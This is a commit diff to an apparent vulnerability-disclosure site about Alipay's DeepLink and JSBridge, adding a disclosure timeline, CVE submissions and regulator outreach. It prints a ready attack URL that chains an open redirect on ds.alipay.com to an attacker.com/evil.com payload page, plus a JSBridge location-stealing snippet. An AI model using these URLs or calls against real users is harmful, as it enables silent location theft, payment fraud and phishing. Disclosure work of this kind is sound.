icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

Add whitelist bypass emphasis, WeChat articles, official update declaration

Browse Source 
- Add whitelist bypass banner (CVSS 9.3) prominently at top of blog
- Add official declaration: updates only via innora.ai/zfb/ and WeChat AI-security-innora
- Add 4 WeChat article links with titles at blog header
- Sanitize case reference numbers from blog content
- Update CSSF to 4 departments confirmed (ICT Risk Supervision)
- Update response count to 39+
- Add rebuttal.html (legal defense document)
- Update README with CVE info, global regulatory response, whitelist bypass details

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-14 09:12:47 +08:00
parent 435a125f78
commit 72ae043493
4 changed files with 1249 additions and 59 deletions
Download Patch File Download Diff File Expand all files Collapse all files

685
index.html
View File

@@ -461,6 +461,135 @@ body.lang-en .en { display: block; }
</div>
</div>
<!-- ==================== OFFICIAL UPDATE DECLARATION + WECHAT ARTICLES ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.08), rgba(153,102,255,.06));border:2px solid #4488ff;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:3px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div>
<h2 style="color:#4488ff;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">📢 官方声明 &amp; 微信公众号文章</span>
<span class="en">📢 Official Statement &amp; WeChat Articles</span>
</h2>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:14px 16px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ 重要声明:</strong>本研究的所有后续更新<strong>仅通过以下两个官方渠道发布</strong><br>
1⃣ 本页面(<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code><br>
2⃣ 微信公众号 <strong style="color:#4488ff;">AI-security-innora</strong><br>
其他任何渠道发布的内容均非本团队授权,请勿轻信。
</span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:1.8;">
<strong style="color:#ff4444;">⚠️ Important:</strong> All future updates to this research are published <strong>exclusively through two official channels</strong>:<br>
1⃣ This page (<code style="background:#1a1a28;padding:2px 6px;border-radius:4px;">https://innora.ai/zfb/</code>)<br>
2⃣ WeChat Official Account: <strong style="color:#4488ff;">AI-security-innora</strong><br>
Content from any other source is not authorized by our team.
</span>
</div>
<div style="display:grid;gap:10px;">
<a href="https://mp.weixin.qq.com/s/XB1QSbn0icfCMg-9CANuYw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff4444;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">NEW</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span>
<span class="en">When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析</span>
<span class="en">Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/A5rLWe46-I_U7p5ts3sdGg" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#ff6b35;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">HOT</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span>
<span class="en">Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)</span>
<span class="en">Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089)</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/M42BfJPVUhVTeyx1Iw__cw" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#9966ff;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">LEGAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span>
<span class="en">Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"?</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">完整法律申诉 — 逐条回应投诉方三项"不实信息"主张</span>
<span class="en">Full legal defense — point-by-point rebuttal of all three "false information" claims</span>
</div>
</a>
<a href="https://mp.weixin.qq.com/s/xEBEYZlap3xuDMURuJd7_Q" target="_blank" style="display:block;background:rgba(255,255,255,.04);border:1px solid #2a2a3a;border-radius:8px;padding:12px 16px;text-decoration:none;transition:border-color .2s;">
<div style="display:flex;align-items:center;gap:10px;">
<span style="background:#44cc88;color:#fff;font-size:11px;padding:2px 8px;border-radius:4px;font-weight:bold;white-space:nowrap;">ORIGINAL</span>
<span style="color:#e0e0e8;font-size:15px;font-weight:600;">
<span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span>
<span class="en">Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People</span>
</span>
</div>
<div style="color:#9898a8;font-size:12px;margin-top:4px;padding-left:52px;">
<span class="zh">原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证</span>
<span class="en">Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries</span>
</div>
</a>
</div>
</div>
</div>
<!-- ==================== CRITICAL: WHITELIST BYPASS BANNER ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,107,53,.08));border:2px solid #ff4444;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff4444,#ff6b35,#ff4444);"></div>
<h2 style="color:#ff4444;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">⚠️ 核心发现:白名单绕过 — 任何人无需任何权限即可远程利用 (CVSS 9.3)</span>
<span class="en">⚠️ Key Finding: Whitelist Bypass — Remotely Exploitable by Anyone, No Permissions Required (CVSS 9.3)</span>
</h2>
<div class="zh">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">这是整个攻击链的钥匙。</strong>支付宝使用域名白名单限制 WebView 中可加载的页面。但其自有域名 <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> 存在开放重定向漏洞,允许攻击者通过白名单域名跳转加载任意恶意页面。<strong>没有此绕过,其余漏洞仅限局域网;有了它,人人可远程利用。</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">不需要任何开发者权限。</strong>不需要注册支付宝开放平台、不需要小程序开发者资格、不需要任何审批。攻击者只需构造一条 URL通过微信、WhatsApp、短信或任何即时通讯工具发送给受害者。</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17个漏洞因此从"理论"变为"实战"。</strong>攻击者页面一旦加载到支付宝 WebView 中,即获得完整的 JSBridge API 访问权限——<strong>静默窃取 GPS 坐标、调用支付接口、打开相机、伪造 UI</strong>——全部通过一条链接完成。</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">厂商自己承认严重性。</strong>蚂蚁集团安全团队在与我们的通话中明确表示:<em>"如果能绕过我们的白名单限制,那就严重了"</em>。通话结束后不到 2 分钟,白名单即被绕过。<strong>厂商确认了严重性,但至今拒绝修复,称其为"正常功能"。</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// 任何人都可以构造的攻击链接:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
<div class="en">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">This is the master key to the entire attack chain.</strong> Alipay uses a domain whitelist to restrict pages loadable in its WebView. However, its own domain <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> has an open redirect vulnerability, allowing attackers to load arbitrary malicious pages through the whitelisted domain. <strong>Without this bypass, other vulnerabilities are LAN-only; with it, anyone can attack remotely.</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">No developer permissions required.</strong> No Alipay Open Platform registration, no Mini Program developer credentials, no approval process. An attacker simply crafts a URL and sends it via WeChat, WhatsApp, SMS, or any messaging app.</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17 vulnerabilities go from "theoretical" to "in-the-wild."</strong> Once the attacker's page loads inside Alipay's WebView, it gains full JSBridge API access — <strong>silently steal GPS coordinates, invoke payment interfaces, access the camera, spoof UI elements</strong> — all through a single link.</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">The vendor acknowledged the severity.</strong> Ant Group's security team stated during our call: <em>"If you can bypass our whitelist, that would be serious."</em> Less than 2 minutes after the call ended, the whitelist was bypassed. <strong>The vendor confirmed it was serious, yet still refuses to patch, calling it "normal functionality."</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// Attack URL anyone can construct:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
</div>
</div>
<div class="container">
<!-- ==================== META ==================== -->
@@ -568,36 +697,85 @@ body.lang-en .en { display: block; }
<div class="timeline-item">
<div class="timeline-date">2026-02-25</div>
<p>
<span class="zh"><strong>第一次报告</strong> — TLS/SSL 安全分析报告发送至 bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com</span>
<span class="en"><strong>First Report</strong> — TLS/SSL security analysis sent to bin.z@antgroup.com, lingyan.wanglingya@antgroup.com, antsrc@service.alipay.com</span>
<span class="zh"><strong>第一次报告</strong> — TLS/SSL 中间人攻击 + 设备指纹问题,通过厂商安全应急响应中心(SRC)提交<br><em style="opacity:.7;font-size:.9em;">注:此次报告的是 TLS/SSL 相关问题DeepLink/JSBridge 攻击链尚未发现</em></span>
<span class="en"><strong>First Report</strong> — TLS/SSL MITM + device fingerprinting issues submitted via vendor's Security Response Center (SRC)<br><em style="opacity:.7;font-size:.9em;">Note: This report covered TLS/SSL issues only; the DeepLink/JSBridge attack chain had not yet been discovered</em></span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-06</div>
<p>
<span class="zh">综合安全分析完成,包含 SecurityGuard、BabaSSL、DexAOP 等模块的深度分析</span>
<span class="en">Comprehensive analysis completed covering SecurityGuard, BabaSSL, DexAOP and more</span>
<span class="zh"><strong>AntSRC 回复</strong>"经过我们安全工程师审核,无法被实际利用"</span>
<span class="en"><strong>AntSRC Reply</strong>: "After review by our security engineers, [the issues] cannot be practically exploited"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 04:08</div>
<p>
<span class="zh"><strong>第二次报告</strong> — DeepLink + JSBridge 8个漏洞的完整攻击链报告发送至蚂蚁集团联系</span>
<span class="en"><strong>Second Report</strong> Full DeepLink + JSBridge attack chain report (8 issues) sent to Ant Group contact</span>
<span class="zh"><strong>第二次报告</strong> 发现 DeepLink+JSBridge 攻击链,提交 8 个漏洞2 CRITICAL + 4 HIGH发送至厂商安全团队对接</span>
<span class="en"><strong>Second Report</strong> — DeepLink+JSBridge attack chain discovered, 8 issues (2 CRITICAL + 4 HIGH) sent to vendor security contact</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 06:07</div>
<p>
<span class="zh"><strong>第三次报告</strong>V3增强版17个漏洞 + 308条服务器日志 + 42张截图</span>
<span class="en"><strong>Third Report</strong>V3 enhanced, 17 issues + 308 server logs + 42 screenshots</span>
<span class="zh"><strong>第三次报告V3</strong>扩展至 17 个漏洞,含资金操作风险 + 308 条服务器日志 + 42 张截图</span>
<span class="en"><strong>Third Report (V3)</strong>Expanded to 17 issues including financial operation risks + 308 server logs + 42 screenshots</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07</div>
<div class="timeline-date">2026-03-07 07:54</div>
<p>
<span class="zh"><strong>第四次报告</strong> — 端到端外部攻击报告含Samsung S25 Ultra + iPhone 16 Pro跨平台验证</span>
<span class="en"><strong>Fourth Report</strong> — E2E external attack report with cross-platform Samsung S25 Ultra + iPhone 16 Pro verification</span>
<span class="zh"><strong>第四次报告</strong> — 端到端外部攻击完整演示3 台设备跨国验证(新西兰/马来西亚/中国),含在线复现链接</span>
<span class="en"><strong>Fourth Report</strong> Full E2E external attack demo, 3 devices cross-country verification (NZ/MY/CN), with live reproduction URL</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 12:33</div>
<p>
<span class="zh"><strong>厂商回复</strong>"漏洞报告邮件已收到,我们会安排人尽快分析,完了给你回复"</span>
<span class="en"><strong>Vendor Reply</strong>: "Vulnerability report emails received, we will arrange someone to analyze ASAP and reply"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:25</div>
<p>
<span class="zh"><strong>微信语音通话15分46秒</strong> — 厂商安全业务负责人在通话中辩称"局域网内本来就对这些功能开放",试图将攻击面限定为局域网场景。并暗示:<strong>"如果能绕过我们的白名单限制,那就严重了"</strong>。此前所有测试确实在局域网环境下(研究员本机与测试手机 Xiaomi Redmi 12 在同一 WiFi 网络PoC 页面部署在 192.168.80.12:8888</span>
<span class="en"><strong>WeChat Voice Call (15m 46s)</strong> — Vendor security lead argued that "these features are designed to be open within LAN" and attempted to frame the attack surface as LAN-only. The lead implied: <strong>"If you can bypass our whitelist, that would be serious."</strong> All prior testing had indeed been on a local network (researcher's machine and Xiaomi Redmi 12 test phone on the same WiFi), with PoC pages hosted at 192.168.80.12:8888</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:36</div>
<p>
<span class="zh"><strong>白名单绕过 — 2 分钟内完成</strong> — 通话结束后不到 2 分钟,我们即绕过了厂商自以为安全的白名单机制。绕过方法:利用 <code>ds.alipay.com/?scheme=</code> 开放重定向参数。该域名 (ds.alipay.com) 本身在 Alipay WebView 的白名单中,其 <code>?scheme=</code> 参数接受任意 URL 跳转,攻击者可构造 <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code>URL 的 host 为白名单域名,但实际加载攻击者页面。<strong>这彻底否定了"局域网限定"的辩解</strong>——任何互联网上的页面都可以通过白名单域名跳转进入 Alipay WebView 并调用 JSBridge API</span>
<span class="en"><strong>Whitelist Bypass — Completed in Under 2 Minutes</strong> — Less than 2 minutes after the call ended, we bypassed the vendor's whitelist mechanism they believed was secure. Method: exploiting the <code>ds.alipay.com/?scheme=</code> open redirect parameter. The domain ds.alipay.com is itself whitelisted in Alipay's WebView, and its <code>?scheme=</code> parameter accepts arbitrary URL redirects. An attacker can craft <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code> — the URL host is a whitelisted domain, but it actually loads the attacker's page. <strong>This completely invalidated the "LAN-only" defense</strong> — any page on the internet can use the whitelisted domain redirect to enter Alipay's WebView and invoke JSBridge APIs</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:01</div>
<p>
<span class="zh"><strong>公网 PoC 部署 + 第二次语音通话7分07秒</strong> — 将 PoC 部署至公网 <code>https://innora.ai/sec/trigger.html</code>(触发页)和 <code>https://innora.ai/sec/verify.html</code>(载荷页),发送给厂商安全人员验证。证明攻击在互联网环境下完全可行,不限于局域网</span>
<span class="en"><strong>Public PoC Deployment + Second Voice Call (7m 07s)</strong> — Deployed PoC to public internet at <code>https://innora.ai/sec/trigger.html</code> (trigger page) and <code>https://innora.ai/sec/verify.html</code> (payload page), sent to vendor security lead for verification. Proved the attack is fully viable over the internet, not limited to LAN</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:09</div>
<p>
<span class="zh"><strong>厂商安全人员亲测 — iPhone 从杭州连接</strong> — 服务器日志显示来自杭州(支付宝总部所在地)的 iPhone 17 Pro Max 连接GPS 定位 (30.3xxx, 120.1xxx) 精度 9.99m。设备有 2xxGB 存储、80% 电量。<strong>关键发现iOS 上有 18 个 JSBridge API 可用,比 Android (13 个) 多出 5 个高危 APItradePay、share、getLocation、scan、chooseImage</strong>。iOS 版 tradePay支付和 getLocation定位均可从外部页面直接调用而 Android 上这些 API 被拦截。这意味着 <strong>iOS 攻击面显著大于 Android</strong>,且 share API 可实现蠕虫式传播</span>
<span class="en"><strong>Vendor Security Lead Tests — iPhone Connects from Hangzhou</strong> — Server logs show iPhone 17 Pro Max connecting from Hangzhou (Alipay HQ city), GPS (30.3xxx, 120.1xxx) accuracy 9.99m. Device: 2xxGB storage, 80% battery. <strong>Critical discovery: 18 JSBridge APIs available on iOS vs 13 on Android — 5 additional high-risk APIs: tradePay, share, getLocation, scan, chooseImage</strong>. iOS tradePay (payment) and getLocation (GPS) can be invoked from external pages, while Android blocks them. This means <strong>iOS attack surface is significantly larger than Android</strong>, and the share API enables worm-like propagation</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:2817:03</div>
<p>
<span class="zh"><strong>V6 PoC + 多设备验证</strong> — 创建针对高影响力漏洞的 V6 版 PoC(1) 静默 GPS+设备指纹窃取 (2) 支付引导攻击 (3) UI 钓鱼 (4) 敏感页面跳转链 (5) share API 蠕虫传播iOS。测试账户因频繁触发风控被封锁委托新西兰朋友测试——正常触发。随后用妻子的 iPhone 验证——同样成功。厂商回复"OK我们分析下"</span>
<span class="en"><strong>V6 PoC + Multi-device Verification</strong> — Created V6 PoC targeting high-impact vulns: (1) silent GPS+device fingerprint theft (2) payment redirection attack (3) phishing UI (4) sensitive page redirect chains (5) share API worm propagation (iOS). Test account banned due to risk control triggers; delegated to friend in New Zealand — triggered successfully. Then verified with spouse's iPhone — also successful. Vendor replied "OK, let us analyze"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-08</div>
<p>
<span class="zh"><strong>厂商第二轮验证</strong> — 安全业务负责人在杭州使用 iPhone 16 Pro 进行更深入测试。全程无任何 GPS 授权声明/弹窗,页面加载到 GPS 数据回传仅约 7 秒。3 轮测试精度从 17.4m 递进至 9.99m 再到 8.81m<code>locationReducedAccuracy: 0</code>(精确定位模式)。此轮测试进一步确认了前日发现的 iOS 攻击面问题,且证实 GPS 外泄在用户完全无感知的情况下发生</span>
<span class="en"><strong>Vendor Second-round Verification</strong> — Security business lead conducted deeper testing in Hangzhou with iPhone 16 Pro. Zero GPS authorization dialogs appeared throughout; GPS data transmitted within ~7 seconds of page load. 3-round accuracy improved from 17.4m to 9.99m to 8.81m, with <code>locationReducedAccuracy: 0</code> (precise mode). This round further confirmed the iOS attack surface discovered the previous day, and verified GPS exfiltration occurs with zero user awareness</span>
</p>
</div>
<div class="timeline-item">
@@ -610,15 +788,103 @@ body.lang-en .en { display: block; }
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<p>
<span class="zh"><strong>厂商回应</strong>"正常功能" — 不认为是漏洞</span>
<span class="en"><strong>Vendor Response</strong>: "Normal functionality" — not considered a vulnerability</span>
<span class="zh"><strong>厂商最终回复</strong>"根据我们的评估,这些属于正常功能"</span>
<span class="en"><strong>Vendor Final Response</strong>: "Based on our assessment, these are normal functionality"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11</div>
<div class="timeline-date">2026-03-11 ~18:03</div>
<p>
<span class="zh"><strong>公开发布</strong> — 既然厂商确认这些都是"正常功能",那公开讨论"正常功能"的安全影响没有任何问题</span>
<span class="en"><strong>Public Disclosure</strong> — Since the vendor confirmed these are "normal features," discussing the security implications of "normal features" publicly is entirely appropriate</span>
<span class="zh"><strong>微信对话</strong>截图泰国时间17:03+1h=北京时间)— 厂商对接人确认"正常功能"定性(回复"嗯"),我方告知将公开讨论。对接人在对话中使用了"洞"一词,说明内部对发现的安全属性并非毫无认知</span>
<span class="en"><strong>WeChat Conversation</strong> (screenshot in Thai timezone 17:03, +1h = Beijing time) — Vendor contact confirmed "normal functionality" classification. We notified intent to publish. The contact used the colloquial term "洞" (vulnerability) in conversation, suggesting internal awareness of the security nature of these findings</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<p>
<span class="zh"><strong>公开发布</strong> — 厂商明确拒绝修复后,公开研究成果</span>
<span class="en"><strong>Public Disclosure</strong> — After vendor explicitly refused to fix, research published</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 22:45</div>
<p>
<span class="zh"><strong>法律投诉</strong> — 文章发布仅4小时后北京格韵律师事务所代理厂商向微信公众平台投诉我们的文章"内容侵犯名誉/商誉/隐私/肖像"。讽刺的是:<strong>我们的文章从头到尾未出现"支付宝""Alipay""蚂蚁集团"中的任何一个词</strong>。投诉方通过发起投诉,反而自行确认了文章描述的行为与其所代理的企业相关。我们已提交申诉。</span>
<span class="en"><strong>Legal Complaint </strong> — Just 4 hours after publication, Beijing Geyun Law Firm (representing the vendor) filed a "content infringing reputation/goodwill/privacy/likeness" complaint against our WeChat article. The irony: <strong>our article never once mentions "Alipay," "支付宝," or "Ant Group" anywhere in the entire text</strong>. By filing this complaint, the complainant effectively self-identified their client as the subject of the article. We have filed an appeal.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>CVE 提交6个漏洞等待确认中</strong> — 鉴于厂商阿里巴巴作为注册CNA编号CNA-2017-0006拒绝承认漏洞并拒绝分配CVE编号我们通过 MITRE CNA of Last Resort (CNA-LR) 路径分两批提交了6个独立CVE申请<br>
<strong>第一批5个</strong><br>
① DeepLink URL Scheme 访问控制绕过 (CWE-939, CVSS 9.1)<br>
② iOS GPS 静默外泄 — 无授权弹窗 (CWE-359, CVSS 7.4)<br>
③ iOS tradePay 未授权支付流程调用 (CWE-940, CVSS 8.6)<br>
④ UI 欺骗 — showToast/setTitle 伪造支付宝界面 (CWE-451, CVSS 8.1)<br>
⑤ 端到端敏感数据外泄 — 设备指纹+权限状态 (CWE-200, CVSS 8.6)<br>
<strong>第二批1个</strong><br>
⑥ ds.alipay.com 开放重定向绕过白名单机制 (CWE-601+CWE-939, CVSS 9.3) — 利用白名单域名 ds.alipay.com 的 <code>?scheme=</code> 参数实现开放重定向,彻底绕过厂商域名白名单防护,使任何互联网页面均可通过白名单域名跳转链进入 WebView 调用全部 JSBridge API。此绕过在与厂商安全团队通话期间 2 分钟内完成<br>
Credit: Jiqiang Feng (Innora AI Security Research)。等待 MITRE 回复确认中。</span>
<span class="en"><strong>CVE Submission (6 Vulnerabilities, Awaiting Confirmation)</strong> — Since the vendor (Alibaba, a registered CNA: CNA-2017-0006) refused to acknowledge the vulnerabilities and declined to assign CVE IDs, we submitted 6 independent CVE requests in two batches through MITRE's CNA of Last Resort (CNA-LR) pathway:<br>
<strong>Batch 1 (5 CVEs):</strong><br>
① DeepLink URL Scheme Access Control Bypass (CWE-939, CVSS 9.1)<br>
② iOS Silent GPS Exfiltration — No Authorization Prompt (CWE-359, CVSS 7.4)<br>
③ iOS tradePay Unauthorized Payment Flow Invocation (CWE-940, CVSS 8.6)<br>
④ UI Spoofing — showToast/setTitle Fake Alipay Interface (CWE-451, CVSS 8.1)<br>
⑤ End-to-End Sensitive Data Exfiltration — Device Fingerprint + Permission States (CWE-200, CVSS 8.6)<br>
<strong>Batch 2 (1 CVE):</strong><br>
⑥ ds.alipay.com Open Redirect Whitelist Bypass (CWE-601+CWE-939, CVSS 9.3) — Exploits the <code>?scheme=</code> parameter on whitelisted domain ds.alipay.com to perform an open redirect, completely bypassing the vendor's domain whitelist protection. Any internet-hosted page can chain through the whitelisted domain to enter WebView and invoke all JSBridge APIs. This bypass was achieved in under 2 minutes during a live call with the vendor security team<br>
Credit: Jiqiang Feng (Innora AI Security Research). Awaiting MITRE confirmation.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>全球通知</strong> — 向 23 个金融监管机构、13 个国家 CERT、14 家竞争对手安全团队、50+ 家国际媒体发送漏洞披露通知</span>
<span class="en"><strong>Global Notification</strong> — Vulnerability disclosure sent to 23 financial regulators, 13 national CERTs, 14 competitor security teams, and 50+ international media outlets</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>新加坡 PDPC 正式立案调查</strong> — 新加坡个人数据保护委员会 (PDPC) 回复确认已开启正式调查</span>
<span class="en"><strong>Singapore PDPC Formal Investigation</strong> — Singapore's Personal Data Protection Commission confirmed opening a formal investigation </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Google Play 启动调查</strong> — 向 Google Play 提交正式政策违规举报违反用户数据政策、权限政策、欺骗行为政策Google 确认收到并回复:"We will investigate and take appropriate action"</span>
<span class="en"><strong>Google Play Investigation</strong> — Formal policy violation report submitted to Google Play (User Data, Permissions, Deceptive Behavior policies). Google confirmed: "We will investigate and take appropriate action" </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Apple Product Security 启动调查</strong> — Apple 产品安全团队人工回复Brent确认已将报告转发给相关调查团队。Apple 正在调查 Alipay iOS 端 JSBridge 暴露的 tradePay支付、scan扫码、chooseImage相机等高危 API</span>
<span class="en"><strong>Apple Product Security Investigation</strong> — Apple Product Security responded (Brent): "Your report was forwarded along to the appropriate team for investigation." Apple is investigating Alipay iOS JSBridge exposure of tradePay, scan, chooseImage APIs </span>
</p>
</div>
<div class="timeline-item" style="background: linear-gradient(135deg, rgba(0,200,83,0.08), rgba(0,200,83,0.02)); border-left-color: #00c853;">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Packet Storm Security 公开收录</strong> — 漏洞通告被 Packet Storm Security全球知名漏洞数据库正式收录并发布<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>标题:"Alipay Open Redirect / API Attacker Payload Insertion"</span>
<span class="en"><strong>Packet Storm Security Publication</strong> — Advisory officially published on Packet Storm Security (major global vulnerability database):<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>Title: "Alipay Open Redirect / API Attacker Payload Insertion"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>HKCERT → CNCERT</strong> — 香港计算机应急协调中心 (HKCERT) 确认已将报告转交中国国家网络安全应急响应中心 (CNCERT)</span>
<span class="en"><strong>HKCERT → CNCERT</strong> — Hong Kong CERT confirmed forwarding the report to China National CERT (CNCERT)</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>荷兰央行 (DNB) 正式回复</strong> — 指出 CSSF 卢森堡为 Alipay 欧洲的主要监管机构,提供 GDPR 第32条处理安全性违规执法路径。CERT-Luxembourg (CIRCL) 事件处理分析师 Michael Hamm 确认将寻找 Alipay 欧洲实体联系人转发报告</span>
<span class="en"><strong>DNB Netherlands Formal Response</strong> — Identified CSSF Luxembourg as Alipay Europe's Primary Supervisory Authority, provided GDPR Article 32 enforcement pathway. CERT-Luxembourg (CIRCL) incident handler Michael Hamm confirmed locating appropriate Alipay European entity contact to forward the report</span>
</p>
</div>
</div>
@@ -736,7 +1002,7 @@ body.lang-en .en { display: block; }
</p>
<pre><code>// GPS 定位窃取
AlipayJSBridge.call("getLocation", {}, function(result) {
// result = {lat: 5.460012, lng: 100.314139, city: "槟城"}
